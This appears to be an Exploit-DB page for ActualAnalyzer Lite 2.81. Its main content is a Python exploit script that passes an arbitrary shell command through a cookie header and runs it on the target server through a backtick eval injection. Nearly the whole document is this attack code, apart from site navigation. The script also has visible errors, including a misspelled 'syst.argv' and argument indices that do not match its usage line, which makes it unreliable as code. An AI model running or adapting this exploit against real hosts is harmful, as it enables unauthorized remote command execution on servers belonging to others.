ActualAnalyzer Lite 2.81 - Command Execution

EDB-ID:

34450

CVE:


EDB Verified:

Author:

Benjamin Harris

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2014-08-28

Vulnerable App: 
###############################
# ActualAnalyzer  exploit.
# Tested on Lite version 
# We load command into a dummy variable as we only have 6 characters to own the eval 
# but load more as first 2 characters get rm'd.
# We then execute the eval with backticks.
# 11/05/2011
##############################

import urllib
import urllib2
import sys
import time



def banner():
	print "	    ____                        __              __                  __                     "
	print "	   / __/_  ______ _ ____ ______/ /___  ______ _/ /___ _____  ____ _/ /_  ______  ___  _____"
	print "	  / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_  / / _ \/ ___/"
	print "	 / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/  __/ /    "
	print "	/_/  \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/     "
	print "	             /_/                                                  /____/                   "


def usage():
	print "	[+] Usage:"
	print "	[-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\""
	print "	[-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\""

banner()
if len(sys.argv) < 6:
	usage()
	quit()
domain = sys.argv[2]
command = sys.argv[6]
host = syst.argv[4]

def commandexploit(domain,host,command):
	url = 'http://' + domain + '/aa.php?anp=' + host 
	data = None
	headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}
	exploit1 = urllib2.Request(url,data,headers)
	exploit2 = urllib2.urlopen(exploit1)

commandexploit(domain,host,command)
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services